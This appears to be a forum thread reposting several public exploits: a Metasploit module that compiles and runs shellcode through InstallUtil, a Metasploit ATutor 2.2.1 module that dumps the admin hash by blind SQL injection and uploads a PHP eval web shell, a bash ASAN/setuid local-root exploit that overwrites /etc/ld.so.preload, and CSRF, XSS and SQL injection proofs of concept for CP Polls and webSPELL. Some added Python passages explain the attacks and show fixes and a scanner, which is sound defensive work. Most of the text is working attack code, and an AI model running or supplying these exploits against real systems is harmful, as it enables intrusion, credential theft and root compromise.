    # Run Method for when run command is issued
    def exploit
    if datastore['TECHNIQUE'] == 'INSTALLUTIL'
    if payload.arch.first == 'x64' && sysinfo['Architecture'] !~ /64/
    fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.')
    end
    end
    
    # sysinfo is only on meterpreter sessions
    print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
    
    if datastore['TECHNIQUE'] == 'INSTALLUTIL'
    execute_installutil
    end
    end
    
    def execute_installutil
    envs = get_envs('TEMP', 'windir')
    
    dotnet_path = get_dotnet_path(envs['windir'])
    print_status("Using .NET path #{dotnet_path}")
    
    cs_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.cs"
    exe_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.exe"
    
    installutil_path = "#{dotnet_path}\\InstallUtil.exe"
    
    print_status("Writing payload to #{cs_path}")
    write_file(cs_path, generate_csharp_source)
    register_files_for_cleanup(cs_path)
    
    print_status("Compiling payload to #{exe_path}")
    csc_path = "#{dotnet_path}csc.exe"
    csc_platform = payload.arch.first == 'x86' ? 'x86' : 'x64'
    vprint_status("Executing: #{csc_path} /target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")
    cmd_exec(csc_path, "/target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")
    
    print_status("Executing payload ...")
    vprint_status("Executing: #{installutil_path} /logfile= /LogToConsole=false /U #{exe_path}")
    client.sys.process.execute(installutil_path, "/logfile= /LogToConsole=false /U #{exe_path}", {'Hidden' => true})
    register_files_for_cleanup(exe_path)
    end
    
    def get_dotnet_path(windir)
    base_path = "#{windir}\\Microsoft.NET\\Framework#{payload.arch.first == 'x86' ? '' : '64'}"
    paths = dir(base_path).select {|p| p[0] == 'v'}
    dotnet_path = nil
    
    paths.reverse.each do |p|
    path = "#{base_path}\\#{p}"
    if directory?(path) && file?("#{path}\\InstallUtil.exe")
    dotnet_path = path
    break
    end
    end
    
    unless dotnet_path
    fail_with(Failure::NotVulnerable, '.NET is not present on the target.')
    end
    
    dotnet_path
    end
    
    def generate_csharp_source
    sc = payload.encoded.each_byte.map {|b| "0x#{b.to_s(16)}"}.join(',')
    cs = %Q^
    using System;
    
    namespace Pop
    {
    public class Program { public static void Main() { } }
    
    [System.ComponentModel.RunInstaller(true)]
    public class Pop : System.Configuration.Install.Installer
    {
    private static Int32 MEM_COMMIT=0x1000;
    private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
    private static UInt32 INFINITE = 0xFFFFFFFF;
    
    [System.Runtime.InteropServices.DllImport("kernel32")]
    private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
    
    [System.Runtime.InteropServices.DllImport("kernel32")]
    private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);
    
    [System.Runtime.InteropServices.DllImport("kernel32")]
    private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
    
    public override void Uninstall(System.Collections.IDictionary s)
    {
    byte[] sc = new byte[] {#{sc}};
    IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length);
    IntPtr id = IntPtr.Zero;
    WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE);
    }
    }
    }
    ^
    
    cs
    end
    
    end

    exploit source : packetstormsecurity.com

    • Upvote 1
  14. ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    require 'msf/core'
    
    class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
    
    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::FileDropper
    
    def initialize(info={})
    super(update_info(info,
    'Name' => 'ATutor 2.2.1 SQL Injection / Remote Code Execution',
    'Description' => %q{
    This module exploits a SQL Injection vulnerability and an authentication weakness
    vulnerability in ATutor. This essentially means an attacker can bypass authentication
    and reach the administrator's interface where they can upload malicious code.
    
    You are required to login to the target to reach the SQL Injection, however this
    can be done as a student account and remote registration is enabled by default.
    },
    'License' => MSF_LICENSE,
    'Author' =>
    [
    'mr_me <steventhomasseeley[at]gmail.com>', # initial discovery, msf code
    ],
    'References' =>
    [
    [ 'CVE', '2016-2555' ],
    [ 'URL', 'http://www.atutor.ca/' ] # Official Website
    ],
    'Privileged' => false,
    'Payload' =>
    {
    'DisableNops' => true,
    },
    'Platform' => ['php'],
    'Arch' => ARCH_PHP,
    'Targets' => [[ 'Automatic', { }]],
    'DisclosureDate' => 'Mar 1 2016',
    'DefaultTarget' => 0))
    
    register_options(
    [
    OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']),
    OptString.new('USERNAME', [true, 'The username to authenticate as']),
    OptString.new('PASSWORD', [true, 'The password to authenticate with'])
    ],self.class)
    end
    
    def print_status(msg='')
    super("#{peer} - #{msg}")
    end
    
    def print_error(msg='')
    super("#{peer} - #{msg}")
    end
    
    def print_good(msg='')
    super("#{peer} - #{msg}")
    end
    
    def check
    # the only way to test if the target is vuln
    begin
    test_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
    rescue Msf::Exploit::Failed => e
    vprint_error(e.message)
    return Exploit::CheckCode::Unknown
    end
    
    if test_injection(test_cookie)
    return Exploit::CheckCode::Vulnerable
    else
    return Exploit::CheckCode::Safe
    end
    end
    
    def create_zip_file
    zip_file = Rex::Zip::Archive.new
    @header = Rex::Text.rand_text_alpha_upper(4)
    @payload_name = Rex::Text.rand_text_alpha_lower(4)
    @plugin_name = Rex::Text.rand_text_alpha_lower(3)
    
    path = "#{@plugin_name}/#{@payload_name}.php"
    register_file_for_cleanup("#{@payload_name}.php", "../../content/module/#{path}")
    
    zip_file.add_file(path, "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>")
    zip_file.pack
    end
    
    def exec_code
    send_request_cgi({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, "mods", @plugin_name, "#{@payload_name}.php"),
    'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
    })
    end
    
    def upload_shell(cookie)
    post_data = Rex::MIME::Message.new
    post_data.add_part(create_zip_file, 'archive/zip', nil, "form-data; name=\"modulefile\"; filename=\"#{@plugin_name}.zip\"")
    post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name=\"install_upload\"")
    data = post_data.to_s
    res = send_request_cgi({
    'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "install_modules.php"),
    'method' => 'POST',
    'data' => data,
    'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
    'cookie' => cookie,
    'agent' => 'Mozilla'
    })
    
    if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_1.php?mod=#{@plugin_name}")
    res = send_request_cgi({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", res.redirection),
    'cookie' => cookie,
    'agent' => 'Mozilla',
    })
    if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_2.php?mod=#{@plugin_name}")
    res = send_request_cgi({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "module_install_step_2.php?mod=#{@plugin_name}"),
    'cookie' => cookie,
    'agent' => 'Mozilla',
    })
    return true
    end
    end
    
    # auth failed if we land here, bail
    fail_with(Failure::Unknown, "Unable to upload php code")
    return false
    end
    
    def get_hashed_password(token, password, bypass)
    if bypass
    return Rex::Text.sha1(password + token)
    else
    return Rex::Text.sha1(Rex::Text.sha1(password) + token)
    end
    end
    
    def login(username, password, bypass)
    res = send_request_cgi({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, "login.php"),
    'agent' => 'Mozilla',
    })
    
    token = $1 if res.body =~ /\) \+ "(.*)"\);/
    cookie = "ATutorID=#{$1};" if res.get_cookies =~ /; ATutorID=(.*); ATutorID=/
    if bypass
    password = get_hashed_password(token, password, true)
    else
    password = get_hashed_password(token, password, false)
    end
    
    res = send_request_cgi({
    'method' => 'POST',
    'uri' => normalize_uri(target_uri.path, "login.php"),
    'vars_post' => {
    'form_password_hidden' => password,
    'form_login' => username,
    'submit' => 'Login'
    },
    'cookie' => cookie,
    'agent' => 'Mozilla'
    })
    cookie = "ATutorID=#{$2};" if res.get_cookies =~ /(.*); ATutorID=(.*);/
    
    # this is what happens when no state is maintained by the http client
    if res && res.code == 302
    if res.redirection.to_s.include?('bounce.php?course=0')
    res = send_request_cgi({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, res.redirection),
    'cookie' => cookie,
    'agent' => 'Mozilla'
    })
    cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
    if res && res.code == 302 && res.redirection.to_s.include?('users/index.php')
    res = send_request_cgi({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, res.redirection),
    'cookie' => cookie,
    'agent' => 'Mozilla'
    })
    cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
    return cookie
    end
    elsif res.redirection.to_s.include?('admin/index.php')
    # if we made it here, we are admin
    return cookie
    end
    end
    
    # auth failed if we land here, bail
    fail_with(Failure::NoAccess, "Authentication failed with username #{username}")
    return nil
    end
    
    def perform_request(sqli, cookie)
    # the search requires a minimum of 3 chars
    sqli = "#{Rex::Text.rand_text_alpha(3)}'/**/or/**/#{sqli}/**/or/**/1='"
    rand_key = Rex::Text.rand_text_alpha(1)
    res = send_request_cgi({
    'method' => 'POST',
    'uri' => normalize_uri(target_uri.path, "mods", "_standard", "social", "connections.php"),
    'vars_post' => {
    "search_friends_#{rand_key}" => sqli,
    'rand_key' => rand_key,
    'search' => 'Search People'
    },
    'cookie' => cookie,
    'agent' => 'Mozilla'
    })
    return res.body
    end
    
    def dump_the_hash(cookie)
    extracted_hash = ""
    sqli = "(select/**/length(concat(login,0x3a,password))/**/from/**/AT_admins/**/limit/**/0,1)"
    login_and_hash_length = generate_sql_and_test(do_true=false, do_test=false, sql=sqli, cookie).to_i
    for i in 1..login_and_hash_length
    sqli = "ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/AT_admins/**/limit/**/0,1),#{i},1))"
    asciival = generate_sql_and_test(false, false, sqli, cookie)
    if asciival >= 0
    extracted_hash << asciival.chr
    end
    end
    return extracted_hash.split(":")
    end
    
    def get_ascii_value(sql, cookie)
    lower = 0
    upper = 126
    while lower < upper
    mid = (lower + upper) / 2
    sqli = "#{sql}>#{mid}"
    result = perform_request(sqli, cookie)
    if result =~ /There are \d entries./
    lower = mid + 1
    else
    upper = mid
    end
    end
    if lower > 0 and lower < 126
    value = lower
    else
    sqli = "#{sql}=#{lower}"
    result = perform_request(sqli, cookie)
    if result =~ /There are \d entries./
    value = lower
    end
    end
    return value
    end
    
    def generate_sql_and_test(do_true=false, do_test=false, sql=nil, cookie)
    if do_test
    if do_true
    result = perform_request("1=1", cookie)
    if result =~ /There are \d entries./
    return true
    end
    elsif not do_true
    result = perform_request("1=2", cookie)
    if not result =~ /There are \d entries./
    return true
    end
    end
    elsif not do_test and sql
    return get_ascii_value(sql, cookie)
    end
    end
    
    def test_injection(cookie)
    if generate_sql_and_test(do_true=true, do_test=true, sql=nil, cookie)
    if generate_sql_and_test(do_true=false, do_test=true, sql=nil, cookie)
    return true
    end
    end
    return false
    end
    
    def report_cred(opts)
    service_data = {
    address: rhost,
    port: rport,
    service_name: ssl ? 'https' : 'http',
    protocol: 'tcp',
    workspace_id: myworkspace_id
    }
    
    credential_data = {
    module_fullname: fullname,
    post_reference_name: self.refname,
    private_data: opts[:password],
    origin_type: :service,
    private_type: :password,
    username: opts[:user]
    }.merge(service_data)
    
    login_data = {
    core: create_credential(credential_data),
    status: Metasploit::Model::Login::Status::SUCCESSFUL,
    last_attempted_at: Time.now
    }.merge(service_data)
    
    create_credential_login(login_data)
    end
    
    def exploit
    student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
    print_status("Logged in as #{datastore['USERNAME']}, sending a few test injections...")
    report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD'])
    
    print_status("Dumping username and password hash...")
    # we got admin hash now
    credz = dump_the_hash(student_cookie)
    print_good("Got the #{credz[0]} hash: #{credz[1]} !")
    if credz
    admin_cookie = login(credz[0], credz[1], true)
    print_status("Logged in as #{credz[0]}, uploading shell...")
    # install a plugin
    if upload_shell(admin_cookie)
    print_good("Shell upload successful!")
    # boom
    exec_code
    end
    end
    end
    end

     

    exploit source : packetstormsecurity.com
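The chain the module above walks (a boolean blind SQL injection answered per character by a binary search, then a login with the dumped hash alone, because ATutor hashes sha1(password) on the client together with the page token) is easier to see without the HTTP plumbing. The Python below is an added example, not part of the Metasploit module or of ATutor: the admin row, the password "s3cret" and the token are constructed sample data, the oracle only simulates the injected search request, and server_accepts is an assumed model of the server-side comparison inferred from get_hashed_password above.

```python
import hashlib

# Constructed sample data (not from ATutor): one row of AT_admins. ATutor stores
# sha1(password); the login form submits sha1(stored_hash + token), where token is a
# fresh value embedded in login.php (this is what get_hashed_password above implies).
ADMIN_ROW = ("admin", hashlib.sha1(b"s3cret").hexdigest())


def sha1_hex(s: str) -> str:
    return hashlib.sha1(s.encode()).hexdigest()


def server_accepts(login: str, form_password_hidden: str, token: str) -> bool:
    """Assumed server-side check: sha1(db_hash + token) must equal the submitted value."""
    user, db_hash = ADMIN_ROW
    return login == user and form_password_hidden == sha1_hex(db_hash + token)


def form_value(secret: str, token: str, have_hash: bool) -> str:
    """Mirror of the module's get_hashed_password: a real user hashes the password
    first; an attacker who already holds sha1(password) skips that step."""
    inner = secret if have_hash else sha1_hex(secret)
    return sha1_hex(inner + token)


class BlindOracle:
    """Stand-in for perform_request(): every call is one injected search request,
    answered true when 'There are N entries.' would appear in the response."""

    def __init__(self, row: str):
        self.row = row            # what concat(login,0x3a,password) evaluates to
        self.requests = 0

    def length_gt(self, n: int) -> bool:            # length(concat(...)) > n
        self.requests += 1
        return len(self.row) > n

    def char_gt(self, pos: int, n: int) -> bool:    # ascii(substring(...,pos,1)) > n
        self.requests += 1
        return ord(self.row[pos - 1]) > n


def binary_search(ask, lower: int = 0, upper: int = 126) -> int:
    """Same search as the module's get_ascii_value: the smallest v with value <= v,
    which is the value itself. At most 7 requests per character."""
    while lower < upper:
        mid = (lower + upper) // 2
        if ask(mid):
            lower = mid + 1
        else:
            upper = mid
    return lower


def dump_row(oracle: BlindOracle) -> str:
    """Mirror of dump_the_hash: first the length, then one search per position."""
    length = binary_search(oracle.length_gt)
    return "".join(chr(binary_search(lambda n, i=i: oracle.char_gt(i, n)))
                   for i in range(1, length + 1))


def attack(token: str):
    """Full chain: dump login:hash through the oracle, then log in with the hash alone."""
    oracle = BlindOracle(":".join(ADMIN_ROW))
    login, db_hash = dump_row(oracle).split(":")
    admin_ok = server_accepts(login, form_value(db_hash, token, have_hash=True), token)
    return login, db_hash, admin_ok, oracle.requests


if __name__ == "__main__":
    login, db_hash, ok, n = attack("c0ffee")
    print(f"dumped {login}:{db_hash} in {n} requests; admin login with hash only: {ok}")
```

The request count is the practical takeaway: "admin:" plus a 40-character SHA-1 is 46 characters, so the dump costs around 330 search requests, all of them POSTs to connections.php from one student session, which is an easy thing to alert on.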

  15. # Exploit Title: WordPress CP Polls 1.0.8 - Cross-site file upload & persistent XSS
    # Date: 2016-02-22
    # Google Dork: Index of /wp-content/plugins/cp-polls/
    # Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
    # Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls
    # Version: 1.0.8
    
    =============
    Description
    =============
    
    With **CP Polls** you can publish a poll into a page/post and optionally display statistics of the results.
    You can receive email notifications every time a vote is added or opt to receive Excel reports periodically.
    
    The Polls can have dependant questions, this means that some questions are displayed depending of the
    selection made on other questions.
    
    (copy of README.txt)
    
    
    ===================
    Technical details
    ===================
    
    CP Polls plugin for WordPress is prone to persistent XSS via cross-site file upload.
    When we register a cp_poll, it is sanitized correctly, but when we upload a CSV file we can
    bypass the protection and inject malicious HTML/JavaScript.
    
    There is no CSRF protection on that action, so it can be exploited with a CSRF attack by sending a
    malicious link to a victim (administrator) and waiting for the malicious request to execute.
    
    =========================
    Proof of Concept (html)
    =========================
    
    <html>
    <body>
    <script>
    function submitRequest()
    {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http://<wp.host>/wp-admin/admin.php?page=CP_Polls&cal=1&list=1&import=1", true);
    xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------17460754011784");
    xhr.setRequestHeader("Accept-Language", "es-MX,es-ES;q=0.9,es;q=0.7,es-AR;q=0.6,es-CL;q=0.4,en-US;q=0.3,en;q=0.1");
    xhr.withCredentials = true;
    var body = "-----------------------------17460754011784\r\n" +
    "Content-Disposition: form-data; name=\"importfile\"; filename=\"csv.csv\"\r\n" +
    "Content-Type: application/octet-stream\r\n" +
    "\r\n" +
    "2013-04-21 18:50:00, 192.168.1.12, <img src=x onerror=alert('You_are_owned!')>,\"<img src=x onerror=alert('I am scared!')>\", \"sample subject\", \"\"\r\n" +
    "-----------------------------17460754011784\r\n" +
    "Content-Disposition: form-data; name=\"pbuttonimport\"\r\n" +
    "\r\n" +
    "Import\r\n" +
    "-----------------------------17460754011784--\r\n";
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
    aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
    }
    </script>
    <form action="#">
    <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
    </body>
    </html>
    
    
    ==========
    CREDITS
    ==========
    
    Vulnerability discovered by:
    Joaquin Ramirez Martinez [i0 security-lab]
    joaquin.ramirez.mtz.lab[at]gmail[dot]com
    https://www.facebook.com/I0-security-lab-524954460988147/
    https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
    
    
    ========
    TIMELINE
    ========
    
    2016-02-10 vulnerability discovered
    2016-02-22 reported to vendor
    2016-03-01 released cp polls v1.0.9
    2016-03-01 public disclosure

     

  16. # Exploit Title: WordPress CP Polls 1.0.8 - Reflected file download (.bat file)
    # Date: 2016-02-22
    # Google Dork: Index of /wp-content/plugins/cp-polls/
    # Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
    # Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls
    # Version: 1.0.8
    # Demo: https://www.youtube.com/watch?v=uc6P59BPEkU
    
    =============
    Description
    =============
    
    With **CP Polls** you can publish a poll into a page/post and optionally display statistics of the results.
    You can receive email notifications every time a vote is added or opt to receive Excel reports periodically.
    
    The Polls can have dependant questions, this means that some questions are displayed depending of the
    selection made on other questions.
    
    (copy of README.txt)
    
    
    ===================
    Technical details
    ===================
    
    CP Polls plugin for WordPress is prone to a file download issue. A hacker is able to attack an administrator by
    exploiting a CSRF in the 'change cp poll name' action, converting the downloadable report file (csv) into a malicious .bat file.
    Because there is no restriction on the cp poll name, the CSRF exploit can change the name to ...
    
    malicious.bat;
    
    The semicolon (;) character must be restricted because the header 'Content-Disposition' uses this character as a
    parameter delimiter. For example, when we change the name of a cp poll to 'malicious.bat;' and an administrator
    downloads the report (thinking that it is a csv file), the response header becomes:
    ""
    Content-Disposition: attachment; file=malicious.bat;.csv
    ""
    the csv is ignored and the administrator gets a .BAT file
    
    
    So, how to exploit this vulnerability to execute commands on the victim's machine?
    We have an option. If the cp_poll is added in a post, we can vote on it and inject our malicious payload
    into a vote.
    
    ==============================
    Proof of Concept CSRF (html)
    ==============================
    
    https://www.youtube.com/watch?v=uc6P59BPEkU
    
    ==========================
    
    If the CSRF attack is successful, we only need to inject our commands into votes. In the ´fieldnames´ POST parameter
    we can inject our commands.
    
    ==========
    CREDITS
    ==========
    
    Vulnerability discovered by:
    Joaquin Ramirez Martinez [i0 security-lab]
    joaquin.ramirez.mtz.lab[at]gmail[dot]com
    https://www.facebook.com/I0-security-lab-524954460988147/
    https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
    
    
    ========
    TIMELINE
    ========
    
    2016-02-10 vulnerability discovered
    2016-02-22 reported to vendor
    2016-03-01 released cp polls v1.0.9
    2016-03-01 public disclosure
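The header trick in the post above comes down to how Content-Disposition parameters are delimited. The Python below is an added example, mine rather than the advisory's or the plugin's code: vulnerable_disposition is an assumed model of the bug (poll name pasted into the header with ".csv" appended and nothing filtered), client_filename models how a download client reads the header, and safe_disposition is the hardened form. The advisory prints the parameter as "file="; the model uses "filename=", the parameter clients actually act on, which is an assumption on my part.

```python
import re

# Assumed model of the bug (not the plugin's code): the poll name is pasted into the
# Content-Disposition header with ".csv" appended and nothing filtered out.
def vulnerable_disposition(poll_name: str) -> str:
    return f"attachment; filename={poll_name}.csv"


def client_filename(header: str):
    """Model of how a download client reads the header: parameters are split on ';',
    so a 'filename=' value ends at the next semicolon. Returns None if there is none."""
    for param in header.split(";")[1:]:
        key, sep, value = param.strip().partition("=")
        if sep and key.strip().lower() == "filename":
            return value.strip().strip('"')
    return None


_DISALLOWED = re.compile(r"[^A-Za-z0-9 ._-]")  # allow-list: ';', '"', '\', CR, LF all go


def safe_disposition(poll_name: str, ext: str = "csv") -> str:
    """Hardened form: allow-list the name, cap its length, force the extension and
    quote the parameter. Quoting alone is not enough, since a '"' or CR/LF in the
    name would still break the header; the allow-list removes them first."""
    base = _DISALLOWED.sub("_", poll_name).strip(" .")[:100] or "report"
    return f'attachment; filename="{base}.{ext}"'


if __name__ == "__main__":
    for name in ("malicious.bat;", "x\r\nSet-Cookie: a=b"):
        print(repr(client_filename(vulnerable_disposition(name))),
              "->", repr(client_filename(safe_disposition(name))))
```

With the poll name 'malicious.bat;' the vulnerable header yields 'malicious.bat' on the client side, exactly as the advisory describes; the hardened header yields 'malicious.bat_.csv'. The same allow-list also closes the CRLF header-injection variant that the unfiltered name would otherwise permit. Note this only fixes the header; the CSRF on the rename action still needs a nonce check.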

     

  17. #!/bin/bash
    # unsanitary.sh - ASAN/SUID Local Root Exploit
    # Exploits er, unsanitized env var passing in ASAN
    # which leads to file clobbering as root when executing
    # setuid root binaries compiled with ASAN.
    # Uses an overwrite of /etc/ld.so.preload to get root on
    # a vulnerable system. Supply your own target binary to
    # use for exploitation.
    # Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363
    # Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk
    # Released under the Snitches Get Stitches Public Licence.
    # Gr33tz to everyone in #lizardhq and elsewhere <3
    # ~infodox (18/02/2016)
    # FREE LAURI LOVE!
    echo "Unsanitary - ASAN/SUID Local Root Exploit ~infodox (2016)"
    if [[ $# -eq 0 ]] ; then
    echo "use: $0 /full/path/to/targetbin"
    echo "where targetbin is setuid root and compiled w/ ASAN"
    exit 0
    fi
    echo "[+] First, we create our shell and library..."
    cat << EOF > /tmp/libhax.c
    #include <stdio.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <unistd.h>
    /* runs inside the next root process that ld.so preloads this library into */
    __attribute__ ((__constructor__))
    void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
    }
    EOF
    gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
    rm -f /tmp/libhax.c
    cat << EOF > /tmp/rootshell.c
    #include <stdio.h>
    #include <unistd.h>
    int main(void){
    char *argv[] = {"/bin/sh", NULL};
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp(argv[0], argv);
    return 0;
    }
    EOF
    gcc -o /tmp/rootshell /tmp/rootshell.c
    rm -f /tmp/rootshell.c
    echo "[+] Now we drop our python symlink spraying tool..."
    cat << EOF > sym.py
    #!/usr/bin/python
    import os
    curpid=os.getpid()
    print(curpid)
    for x in range(0,100):
    newpid=curpid+x
    boom = "foo.%s" %(str(newpid))
    os.symlink("/etc/ld.so.preload", boom)
    EOF
    echo "[+] Spraying dir with symlinks..."
    python sym.py
    echo "[+] Hack the planet!"
    ASAN_OPTIONS='suppressions="/hacktheplanet
    /tmp/libhax.so
    hacktheplanet" log_path=./foo verbosity=1' $1 >/dev/null 2>&1
    $1 >/dev/null 2>&1
    echo "[+] Tidy up a bit..."
    rm -f foo*
    rm -f sym.py
    rm -f /tmp/libhax.so
    echo "[<3] :PPpPpPpOpr000000t!"
    /tmp/rootshell
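The script above needs a target that is both setuid root and built with ASAN, and leaves finding one to the reader. The Python below is an added example, not part of unsanitary.sh: a first-pass hunt for that precondition that walks a tree, keeps regular files with the setuid bit (root-owned by default) and scans them for strings ASAN instrumentation leaves behind. The marker list is my assumption and a substring hit should be confirmed with readelf or nm; demo() builds a constructed tree of fake files, not real binaries, so it runs anywhere.

```python
import os
import stat
import tempfile
from pathlib import Path

# Strings ASAN instrumentation leaves in a binary (assumed marker list): the runtime's
# init symbol, and the shared runtime names that show up in DT_NEEDED of dynamic builds.
ASAN_MARKERS = (b"__asan_init", b"libasan.so", b"libclang_rt.asan")


def looks_asan_instrumented(path, chunk: int = 1 << 20) -> bool:
    """Cheap first pass: chunked substring scan with enough overlap that a marker split
    across two reads is still found. Confirm hits with readelf/nm before acting."""
    overlap = max(len(m) for m in ASAN_MARKERS) - 1
    tail = b""
    with Path(path).open("rb") as f:
        while True:
            buf = f.read(chunk)
            if not buf:
                return False
            window = tail + buf
            if any(m in window for m in ASAN_MARKERS):
                return True
            tail = window[-overlap:]


def find_asan_setuid(root, require_root_owner: bool = True):
    """Walk root and return regular files with the setuid bit (root-owned unless told
    otherwise) that carry ASAN markers, i.e. what unsanitary.sh needs as a target."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            try:
                st = p.lstat()  # lstat so symlinks are never followed while walking
                if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_ISUID:
                    continue
                if require_root_owner and st.st_uid != 0:
                    continue
                if looks_asan_instrumented(p):
                    hits.append(str(p))
            except OSError:
                continue  # unreadable or vanished file: skip, do not abort the sweep
    return sorted(hits)


def demo():
    """Constructed sample tree (fake files, not real binaries): one setuid file with an
    ASAN marker, one setuid file without, one ASAN-marked file that is not setuid."""
    base = Path(tempfile.mkdtemp(prefix="asan-scan-"))
    samples = {
        "suid_asan": (b"\x7fELF" + b"\0" * 64 + b"__asan_init\0", 0o4755),
        "suid_plain": (b"\x7fELF" + b"\0" * 64 + b"main\0", 0o4755),
        "asan_not_suid": (b"\x7fELF" + b"libasan.so.3\0", 0o755),
    }
    for name, (body, mode) in samples.items():
        p = base / name
        p.write_bytes(body)
        p.chmod(mode)
    names = [Path(h).name for h in find_asan_setuid(base, require_root_owner=False)]
    return str(base), names


if __name__ == "__main__":
    print("setuid + ASAN markers:", demo()[1])
```

On a real host run find_asan_setuid("/usr") or "/" as root with the default require_root_owner; anything it returns is a candidate for the log_path clobber above and should either lose the setuid bit or be rebuilt without the sanitizer.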

     

  18. Advisory ID: HTB23291
    Product: webSPELL
    Vendor: webSPELL.org
    Vulnerable Version(s): 4.2.4 and probably prior
    Tested Version: 4.2.4
    Advisory Publication:  January 22, 2016  [without technical details]
    Vendor Notification: January 22, 2016 
    Vendor Patch: February 12, 2016 
    Public Disclosure: February 17, 2016 
    Vulnerability Type: SQL Injection [CWE-89]
    Risk Level: Medium 
    CVSSv3 Base Score: 6.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L]
    Solution Status: Fixed by Vendor
    Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
    
    -----------------------------------------------------------------------------------------------
    
    Advisory Details:
    
    High-Tech Bridge Security Research Lab discovered two vulnerabilities in webSPELL, a popular CMS developed for the needs of esport-related communities. The vulnerability allows a remote authenticated attacker with cashbox access privileges to execute arbitrary SQL commands in the application's database and completely compromise the vulnerable website. This vulnerability can also be exploited by a non-authenticated and unprivileged attacker via the CSRF vector, to which the system is also prone. 
    
    The vulnerability exists due to insufficient filtration of user-supplied data passed via the "payid" HTTP POST parameter to the "/cash_box.php" script. A remote authenticated attacker with cashbox access privileges can alter the present SQL query and execute arbitrary SQL commands in the application's database. 
    
    A simple exploit below uses a time-based SQL injection technique to determine the current version of the MySQL server. The page will be loaded with some delay if the current MySQL server version is 5.x:
    
    
    <form action="http://[host]/cash_box.php" method="post" name="main">
    <input type="hidden" name="pay" value="1">
    <input type="hidden" name="payid[' PROCEDURE analyse((select extractvalue(rand(), concat(0x3a, (IF(MID(version(), 1, 1) LIKE 5, BENCHMARK(5000000, SHA1(1)), 1))))), 1) -- 2]" value="1">
    <input value="submit" id="btn" type="submit" />
    </form>
    
    
    This vulnerability can also be exploited via a CSRF vector, as the "/cash_box.php" script does not validate the origin of the HTTP request before processing user-supplied data in the SQL query.
    
    
    -----------------------------------------------------------------------------------------------
    
    Solution:
    
    Update to webSPELL 4.2.5
    
    More Information:
    https://github.com/webSPELL/webSPELL/issues/309
    
    -----------------------------------------------------------------------------------------------
    
    References:
    
    [1] High-Tech Bridge Advisory HTB23291 - https://www.htbridge.com/advisory/HTB23291 - SQL Injection in webSPELL
    [2] webSPELL - https://www.webspell.org/ - webSPELL is a free content management system under GNU GPL for creating websites easily
    [3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
